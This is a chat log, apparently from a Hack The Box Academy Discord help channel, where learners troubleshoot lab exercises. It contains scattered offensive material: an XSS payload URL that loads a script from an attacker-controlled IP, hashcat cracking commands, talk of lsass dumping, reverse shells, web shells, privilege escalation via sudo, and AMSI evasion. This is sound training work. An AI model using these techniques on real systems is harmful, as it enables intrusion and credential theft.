Hi

why can't I post on general chat?

Please read #welcome and #rules 🙂 it will explain how to get verified

Oh ok

Is this cert going to be industry standard soon?

hopefully it will, it will take some time though

mail,google map,and i forget another one

i have already checked all directory

can some one help me?

https://academy.hackthebox.com/module/17/section/88
how to solve this assessment?i have already checked all the directory

For the SMB flag in Module 77 Section 726, I'm wondering why in the world the SMB connection is so unstable. You get the first couple of commands typed in just fine, then after about 30 seconds, everything you type takes 2 minutes to appear in the terminal, then after a minute or 2 beyond that, a NT_STATUS_INVALID_NETWORK_RESPONSE error occurs and the whole SMB connection just disconnects. Why is this?

I find myself repeatedly having to run:

while [ $? -ne 0 ]; do echo "" | sudo smbclient \\\\<target IP address>\\users; done

Why is the connection so fickle as to make this necessary?

Look further. You’re on the right track

Also don’t spoil the content

Ok i found it

Good job

Good, now again, why the unstable SMB connection in the module I'm working on?

could be the server, maybe try another region

i am writing a report for ANE do i add the list of sub domains i exploited the in the "Exploited hosts" section in the appendix?

Has anyone done Password attacks “Passwd, Shadow & Opasswd” section of the password hacking module recently?
This is driving me nuts. Feels like no matter what different rulelists I use to mutate the wordlist given in wordlists to crack the unshadowed shadow.bak file, nothing returned from hashcat

I'm in the attacking common services module on the easy assessment. I got a username from the smtp service. I am stuck tho. I have tried bruteforcing my way into ftp,rdp etc and nothing. I have been at it for awhile.. any hints to point me in the right direction?

u have to use rockyou instead of the resource password 🤦‍♂️

makes no sense

lol...well ty i appreciate that

Conflicting information - forums say to use the resources, the module itself says rockyou, even in the history of this channel people say to use the password list given in resources and apply the given custom.rule
Unless you're referring to neon

yeah im talking about neon

but the custom rule should work

¯_(ツ)_/¯

The mutated password list is the correct one yes

maybe u got the wrong hash format

The logic for module password cracking is this: 1. List in resources, 2. List you generate throughout the module, 3. List you find on a target, 4. rockyou

PS A:\oven\HACKERMAN\hashcat-6.2.6> ./hashcat.exe --force .\cpts\Password-Attacks\resources-original\password.list -r .\cpts\Password-Attacks\resources-original\custom.rule --stdout | sort -u > .\cpts\Password-Attacks\resources-original\password_mut.list
PS A:\oven\HACKERMAN\hashcat-6.2.6> ./hashcat.exe -m 1800 -a 0 .\cpts\Password-Attacks\unshadow.txt .\cpts\Password-Attacks\resources-original\password_mut.list -o .\cpts\Password-Attacks\unshadow.cracked

[....]

Session..........: hashcat
Status...........: Exhausted

maybe skill issue

Don't use force or ChickenMan will come get you

try taking the attack mode off

The module says to do it, but the actual developer says not to

regen'd without --force and removed -a 0
going to bash my head into my monitor

Did that work?

no

lmao

DM me the hash

yeah im sure that should work

likely pebcak

pm'd 😉

send me it too

i kinda wanna see why that didnt work

Hey so I'm doing the password attacks hard lab and I'm using dislocker to access the files however when I attempt to mount the drive I get this error using these commands

sudo mount -o /media/bitlocker/dislocker-file /media/bitlockermount
mount: /media/bitlockermount: can't find in /etc/fstab.
do I need to edit the /etc/fstab? I'm afraid that could mess with the machine if I do though?

i played it safe and transfered it to a windows vm

Nothing bad will happen if you add a mount entry to the file

But it did seem faster to mount it on Windows so that's what I did at the time

Interesting I didnt think of that

Yeah, I think it was just something like Disk Management - Attach VHD, done

incase anyone reads channel history and has the same issue:
my problem is that I am using windows hashcat to be able to use my GPU without passthru to kali.
the issue is: hashcat ends up generating a wordlist based on custom.rule list from module resources in Windows with around 40k less lines.

I fixed this by generating the wordlist from the rules locally in kali, transferring that wordlist to windows, and cracking from windows like normal.

You generally shouldn't mount unknown drives to your system

Iirc the password list should be ~94k long

@marble cypress sent you a dm if you dont mind

How is it determined/decided which modules etc. grant cubes?

Connection speed has improved somewhat, but I'm still running into this problem periodically. Just curious as to why Samba would ever be slow enough for this to be necessary.

Note the barrage of "NT_STATUS_IO_TIMEOUT" errors — shouldn't be happening, but it is. Why?

@cloud urchin ^

a timeout error is generally going to mean a network issue of some kind, but it could also be a region issue with htb. first troubleshoot your connectivity.

also make sure to wait a few mins after spawning the victim machine because it can take a few minutes to fully come online

try reading the section again

Oh, 🤦🏼‍♂️

Okay, now I'm getting NT_STATUS_BAD_NETWORK_NAME.

Probably trying to call it incorrectly

Also you don't need to escape the $ at the end I don't think

Or you can try wrapping it in quotes, if you're truly needing to connect to ipc

Well if I don't escape the $ at the end then Bash freaks out.

Single quotes*

Bad_network_name generally means it's not meant to be connected to

If this is the getting started module, you don't connect to IPC$

No, I know; was way off track trying to go down rabbit holes not knowing that the whole thing was white-box the whole time. I'm still, however, having to use shell loops to work around the NT_STATUS_IO_TIMEOUT problem which for whatever reason is still rearing its ugly head intermittently.

That's just a connection thing

¯_(ツ)_/¯

Which can happen even in the pwnbox

Depending on server load

Yeah, PwnBox is what I've been in the whole time, and US-Academy-4 is one of the "recommended" connections with a low load. So still wondering what the problem is.

Eh recommended usually just means closest vpn endpoint to you, there's also different pwnbox regions

Ahhhhhhh, can someone help me with the "Introduction to the Windows Command Line" module, specifically the last question in the skills assessment section? I’ve tried several methods and attempted various users, but for some reason, none of the answers are being accepted.

Yeah, seems a lot of traffic in SoCal, but the load is also in the green. So still stuck.

Are you checking against the DC?

Iirc it states connect to the DC and find this info

(The domain controller IP was given earlier)

oh, I think that may be the problem

If you aren't connecting to the DC, you aren't gonna get the right answer 👍

has anyone completed Whitebox attacks? I'm stuck in the part for prototype pollution for DOM based xss, I've been at it for a few days now but I can't manage to figure it out.

What is the best coding app for html

You mean like best ide?

Yeah

So like where to program and test them

Well depends a lot on personal preference, but VSCode and Sublime text are two I use personally for coding in general

Thx i will try them out sorry new to coding and to this server

I cant buy modules

I cant send images and I cant create a post in #1024429874246590575

So im asking here

finally

I clicked a hundred times to buy it hahaha

Disable adblock, also to post in #1024429874246590575 you need to select a tag

am i going insane or is rockyou.txt no longer in the terminal

nvm it was saved as .gz that confused me for a sec

It usually is

As the list is very big

interesting. i last used it 4 months ago it wasnt zipped then. guess they changed it in that time

If you mean on pwnbox, maybe

Btw hashcat generally doesn't have issues reading from it zipped

Has anyone done Windows Privesc Pillaging section? I can't get the restic backups working for some reason and can't bypass the Access Denied

hi, my root flag for "Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer." doesnt work.. (yes i removed all spaces, clear web caches) but all doesnt work..

beginner here. a bit stuck on the flag for the public exploits page of the penetration tester path. i found the exploit i need to use but am struggling with the filepath. maybe im getting the structure of it wrong, but everything i've tried returns no result

i feel like what i should be using as the path is literally stated on the website but when i put that as the filepath in the exploit it doesnt return any files

got it lol

way simpler than i thought it would be...

holy cow im blind. just went to submit the flag and realized it says the path in the question. 🤣

holy cow I don't get a single word of what ur saying

im a noob

Hey it’s me again,

What is the best way to learn html

u could learn html by randomly scrolling w3schools and making dumb projects like me

why would you actually want to learn html?

Oh okay thx appreciate it

MODULE: Whitebox Attacks
SECTION: Client-Side Prototype Pollution

I'm really struggling with getting the admin user to get the /admin.php?promote=2 link to load. I can get the xss, which i just hosted the .js file with a python http server, but when I submit the link to the profile page, it never loads and I can never get the flag. I understand it's something with a link and /admin.php?promote=2 and I can get the xss, but I'm unsure where to go from here since Everytime i submit the link it never works

My current payload for the xss is

||http://94.237.56.194:47879/profile.php?id=2&__proto__[src][]=http://10.10.15.150:1337/test.js||
, where test.js would be like alert(1)

However, if I submit the link for /admin.php?promote=2, it never works and I can't get it to load or even with my resular js file.

@upper haven can I please get a hint? I've been stuck on this for days

This channel isn't for random questions, read and follow #welcome to access more of the server

MODULE: Password Attacks
SECTION: Credential Hunting in Linux

Examine the target and find out the password of the user Will. Then, submit the password as the answer.

Don't need help for this section but wonder how someone could solve this without using "HINT"? I was stuck here for a long time as I had planned not to use hints. The hint gives us additional background information about another user and their possible password for us to work on and I was wondering if it is possible to solve without using it? Does anyone know?

Hi y'all! I could use some help!

I'm stuck on the last two questions in IMAP/POP3 of the Footprinting module.

I've searched through Google, YouTube, Reddit, and the HTB forum. I cannot for the life of me find the correct command(s) needed to find the admin email address, and the IMAP server flag.

Please help 😩

Yeah some of them are impossible to do without the hint for some reason

Lots of brute forcing

1 fetch 1 body[]

The admin email is in the email sent to the compromised user

Chatgpt is really helpful in these situations

Ok, and where do I use that? OpenSSL? Telnet?

ChatGPT is looking really tempting because I've been stuck on this thing for four hours. None of the commands provided in the exercise work. And I've gotten very little to no help out of Google, YouTube, Reddit, and the HTB forums.

Yeah it helped me with some mssql commands

I just typed “How to get an email out of an imap message in telnet” and got the command

Interesting

I can't post screen shots here?

It's not entirely unknown, now is it, and it's a VM

I generated the user name list for H* and just provided firstname, lastname, special chars - yes, number - yes, and leet - yes for custom password list. I filtered out the ones that do not comply with the password policy. But I am still not able to get the correct login credentials.

Also, the remaining time keeps on increasing why?

Found it! 🙌🏽 it only took me half a day 😤

These bruteforcing modules feel more like luck than skill 😭

server-side-attack skill assessment
is it so simple to get the flag
maybe it is a bug
anyone who solved this
pls let me know

it's solvable

okay

"What AD User has a RID equal to Decimal 1170?"

Shouldn't I be able to convert this RID (1170) using cyberchef?

Module: Pivoting, Tunneling and Port Forwarding -> Dynamic Port Forwarding with SSH and SOCKS Tunneling

Hey all, did anyone else run into connectivity issues on the pivot host? I'm using a Kali VM. I'm able to setup the SOCKS tunnel but when running nmap (with proxychains) on 172.16.5.19, I can see the traffic being routed to the pivot host however on the pivot host it gives a serios of connection errors (same thing happens when trying to RDP with proxychains).

Can you provide a screenshot of the errors?

slight typo it should be 172.16.5.19 not 172.15.5.19

but I get the same error

@stark lark

they're the errors from nmap

Yes, but To Hex assumes a string. You want to use To Base for an integer.

Hmm what would the recipe look like?

Just To Base with 16 (hex) as Radix

What's appended to your etc/proxychains.conf?

Thanks!

Hello, i'm doing the footprinting module. I'm at the SMB part. I can't connect to smb to get the flag.txt , I use this command smbclient //ip/path and then it connects to my machine not the htb machine. Can someone help me please ?

I also have a /etc/proxychains4.conf but changing that didn't seem to make any difference

Maybe I'm wrong, but when using SOCKS during the module, wasn't port 1080 used? and 9050 for SSH port forward.

Ah maybe that's why. I'll double check the module.

Looks like it should be 9050 actually

You should be able to run smbclient -N -L //ip to find the shares and then smbclient //ip/share from memory, which share are you trying to connect to?

Can I dm you?

Yeah of course

Yeah It s what I did but it s connect to my machine

and it's asking my password not the machine password

Just checked on my end, have a look into SMB anonymous logins

I think it's covered in the course material

i m trying to connect to sambashare

i m gonna check

I don't want to give away the answer because I'm not sure if HTB will get annoyed but if you look up anonymous SMB logins it is an easy solution. There is a default way to login to SMB, if anonymous login is enabled. The password it is asking for is for SMB, not your computer.

okay yeah i found it, i have just restarted the machine and it worked

thanks for helping

np

Hey guys, im stuck on a module: Information Gathering - Web Edition Skill assessment

||I cant seem to find the hidden web directory "Admin" That the room is hinting to. Im using this command:||

||```
feroxbuster --url=http://inlanefreight.htb:51557/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -t 64

are there any free paths?

I'm working ont he Intro to Windows Evasion. ThreatCheck to make Rubeus bypasss AMIS. Looks like it's caught on bytes associated with 'mscoree.dll'. I attempted to find where this is in the program, but I don't see it. I'm not sure where to search or research next. Any assistance with this would be great.

DM! if still need help

Yo

K bet

Or nah

This isn’t the place. That’s cheating and illegal

Oh

Erm

Oops

If you are only looking for cheats for your game, I suggest you find another server 🙂

What serv

I need to know

No idea. But I do know Hack The Box isn’t the place

Then what is this

Professional platform where cyber security professional learn skills to use in their work.

Hello, i got stuck on Game Hacking Fundamentals - Skills Assessment

What flag is displayed when you successfully modify the Lives counter to a value greater than 5?

So i downloaded the game, and i found the lives address and changed it to 9 and on the bottom of the app a text appeared, but when i try to answer the question the answer is wrong.

If you're looking to download hacks, go somewhere else.

Oh lol wrong thing byee

Bye bye. Take care 🙂

It's actually funny, because he could learn how to do it, literally post above his is learning. But I don't think Jack has the patience.

Oop

Womp womp way to tired

indeed

The target is a docker container. Docker containers cannot reach out to your host, outgoing connections are blocked by a firewall. You cannot host the JS payload on your host but have to supply it in the URL

sent you a dm

All tier 0 modules are free, so some skill paths are too, like the Information Security Foundations path is free

that maake sens

thanks

Hello eyeryone

Is it better to use ports below 1024 for a listener or above? I've read that listening on ports below 1024 can help with firewalls/bypassing security measures, any downsides?

Hello, here is my issue

Question 1 : SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.

ssh [given user]@[given ip] -p [given port number of target IP]
sudo -l
sudo -su user2
cd ~
ls
cat flag.txt

I've got no problem here but for the second question : Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.

I'm trying to escalate the privileges to root withe the id_rsa key, but still when I try to connect with ssh it ask for a password.

What should I do ?

Are you telling SSH to use the key with -i <key file>?

yes

on my htb machine

Did you set the correct permissions on the key file?

yes i did "chmod 600"

Make sure you don't have any whitespace or extra characters in the file. You can see whether SSH is actually using the file by doing ssh -vvv -i <keyfile> <target> and verify the debugging messages

target is user2

I have no Ip

what do you mean? Who is the id_rsa key for?

Windows Privilege Escalation Skills Assessment - Part II question 3 i can't find that disabled user using mimikatz and i can't use secretsdump to extract hash from lsaaa.dmp any hints?

Look what i did :

copied the id rsa from user2, pasted it on my local machine. And tried ssh connection on my local "ssh root@localhost -v -i id_rsa"

why?

if the key is for user2 on a different box, SSH-ing to your own machine as root with that key is never going to work

I'm lost

So what should I do then ? Copy the key on user2 ?

What module and section is this from?

https://academy.hackthebox.com/module/77/section/844

But I don't have any IP for user2, "root@user2 ip" would be more appropriate

I'm finding for which CMS which is used in the above lab and tried with the curl command to see within the header but it didn't showup. Any clues?

user2 is on the same box as user1. You already have that IP

anybody did a game hacking module ?

Windows Privilege Escalation Skills Assessment - Part II question 3 i can't find that disabled user using mimikatz and i can't use secretsdump to extract hash from lsaaa.dmp any hints?

And you found root's id_rsa, which means you can connect as root to the same box as you have been connecting to already

thanks alottt

it's working

Windows Privilege Escalation Skills Assessment - Part II question 3 i can't find that disabled user using mimikatz and i can't use secretsdump to extract hash from lsaaa.dmp any hints?

can any one help me in findind XSS vulnerability .In session hijacking module . im literaly stuck there , cant find any xss vulerability . tho i made a listening port also

guys help me

Hello
in "https://academy.hackthebox.com/module/143/section/1490" first question I dont understand why that's answer is 7
when i search with ldapserach output is :
┌─[✗]─[htb-student@ea-attack01]─[/home/administrator]
└──╼ $ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
forceLogoff: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 5
maxPwdAge: -9223372036854775808
minPwdAge: -864000000000
minPwdLength: 8
modifiedCountAtLastProm: 0
nextRid: 1002
pwdProperties: 1

Plesa can someone explain me

it is in the material in the section

What I have to do now can u explain me pls ?

it is explained in the section

aa understand I just distracted

thanks

there isn't a module basics of sql injection

hello, https://academy.hackthebox.com/module/158/section/1426 i am stuck on this part q2. port forwarding.

RDP port is accesible and my port forward seems to work. but cant open rdp

Don't run it with sudo

As you wont have the $DISPLAY variable properly set

oh its working, thanks

oh, wdym by that? sudo changes that? i remember I had to use sudo with proxy chains before thats why I used it

thanks for your help

I'm working ont he Intro to Windows Evasion. ThreatCheck to make Rubeus bypasss AMIS. Looks like it's caught on bytes associated with 'mscoree.dll'. I attempted to find where this is in the program, but I don't see it. I'm not sure where to search or research next. Any assistance with this would be great.

i am re-doing the Information Gathering Web edition module after the update. I notice there are new questions, but the answers of the previous module version are still there, so I cannot input the answer of the new questions. Any way around that ?

hey guys, im stuck at the getting start module knowledge check, i cant dowload the LinEnum.sh script on the target machine i receive this erro do you guys know why?

Check the permissions for your pwd

i would guess that you do'nt have write permissions to /, you'd most likely can write it to /tmp or /dev/shm

oh im not mrb3n lol

hello everyone

do you also know when you do an ls -la whet p means in the beginning? Its not a dir or file?

never saw it before

doing fuzzing vhosts on htb academy right now

stuck on a minor problem

😅

would be great if anyone can help out

it's a special kind of file - a fifo or named pipe

nvm found it ;]

yeah found it i have a last question, what can i do to have a root shell here? i have sudo perm on this file

https://gtfobins.github.io

many things

its a bit overwelmingh ^^ first time "hacking" a box

👍

Go to the site I’ve sent

it's easy one, check the website above

Search for php, and see what you can do with it

@tender nimbus just remember to use "sudo php ..."

it work but i got the same shell that i already had and when i use sudo i receive this error

Windows Privilege Escalation Skills Assessment - Part II question 3 i can't find that disabled user using mimikatz and i can't use secretsdump to extract hash from lsaaa.dmp any hints?

By default the environment variables do not persist when using sudo.

omg it <as so simple

i was searchoing to far

it was just this to do i tought i had to look to shell and all that stuf

Doing the Attacking Web Applications with Ffuf Module and im having problems with the Final assessment question: One of the pages you will identify should say 'You don't have access!'. What is the full page URL?

I have the page and the full URL. But it doesnt work...i have tried removing the port number but to no success

In waht format should i provide the answer

NVM i got it

how can i report a error in the module

I was doing Game Hacking Fundamentals - Skills Assessment
I managed to change lives to 23 and got a flag but when i enter the flag it is wrong answer.
What flag is displayed when you successfully modify the Lives counter to a value greater than 5?
So i skipped that and did the second question
What flag is displayed when you successfully modify the HiddenScore counter to a value greater than 200'000'000?
So i changed the value to 300000000 and got a flag, i entered the flag and it was correct.
So i was wondering whats going on ?

Maybe there is a (space) it the end of it have u checked that?

It usually because of this issue

If it’s still didn’t work try contacting the support

No, no space, i even tryed to copy paste from the cheat engine.
I found the string in the program, copy to clipboard and paste but its still wrong

Try contacting the support then

Where is the email or discord help ?
I am a bit lost

In the academy page u gonna find hack the box logo at the bottom right

Click on it and u can contact them

thank you, found it

Np anytime man

Figure it out?

no

still trying

Why can't you dump lsass? You should already have admin on the computer by question 3.

i am able dump lsass but secretsdum won;t work

"impacket-secretsdump lsass.dmp -o output.txt " i use this command

RemoteOperations failed: encoding with 'idna' codec failed (UnicodeError: label empty or too long) this is error message

there are a few different ways to get the hashes when you have admin

i tried mimikatz， secretsdump and hashdump in meterpreter

all failed

there is another way

please tell me

i think i found the user's name wks

wksadmin

Hello

I need help with Web fuzzing / filtering fuzzing outout/So I Tried fuzzing Directories and then fuzzing Post using

ffuf -u http://IP:PORT/post.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "y=FUZZ" -w /usr/share/seclists/Discovery/Web-Content/common.txt -v -mc all

With the port I was using I tried filtering by size and such but all I het is incorrect parameter Y. Thanks for the help in advance

please tell me that way i really can't think of any other ways

There are a bunch of ways. https://book.hacktricks.xyz/windows-hardening/stealing-credentials

Bro I've been on footprinting path under DNS module for 2 days straight. This thing is absofuckinglutely undreadable

thanks bro！！

you should open another listener (nv -lvnp PORT)

and replace RHOST with your vpn ip and RPORT with another port listener

and then execute

I wanted to ask, it's a machine but still, is it okay to btute force password for more than 5 minutes 7

Can someone help me with a fedora Linux problem😅

I installed fedora on a MacBook Air and I also installed the required drivers for wifi connectivity but recently after an update it stopped working. I looked into it and it appears the cpu is interrupting the process created by that driver.
I reinstalled the driver and nothing changed.

how do i connect to the HTB vpn

Do you have a kali vm?

Then just use openvpn

ive got arch

Openvpn

Hey man! If you still need help, ping me back. I can help! 🙂

you can always redo the lab using only powershell

Do someone know a taking note app that i can use for my notes? I use oneNote for the moment but i don't realy like it

https://obsidian.md

can i import my NoteBooks from OneNote or do i need to cp everything?

I dunno if you can import them from onenote best bet is to just copy them over

yes, you can
https://help.obsidian.md/import/onenote

Uhhh what?

Why are the EU servers dead?

yep something is going on. check #710108839063846964

😦

frens whats wrong, using rpivot with Pivoting, Tunneling, and Port Forwarding module

supposed to run with python 2.7, how do I fix this?

@autumn pilot Thanks for your reply. But could you tell me is it possible to connect the machine with pwnbox

Hey everyone, right now I'm doing "The Live Engagement" from "Shells & Payloads"

I managed to get the rev shell via ||tomcat war file||. Now I wanted to try the second way ||via the status page. I uploaded the antak.aspx, but neither can switch directories nor can I execute a PowerShell reverse shell command. || I get errors like "term '=' is not recognized.

Any idea why the antak web shell doesn't work here?

can you try basic commands like hostnamee?

that works and gives me the hostname back

sometimes webshells dont work. you cant change directories. I saw this in the AD module or somewhere else, dont remember. if you are trying to get the flag then you directly cat it with the full path. eg cat C:\user\administrator\desktop\flag.txt

are you trying to get a reverse shell from the webshell?

OK that works

Yes after I wasn't able to switch directories I tried to get a reverse shell to check if I can do more with that

if u want reverse shell, may I dm you the way to do it the way i did in AD?

Sure, that would be great

ok

In case somebody running into the same problem: ||Encoding the powershell commmand with base64 solved the issue||

Hello guys

I have a problem at java deobfuscation lesson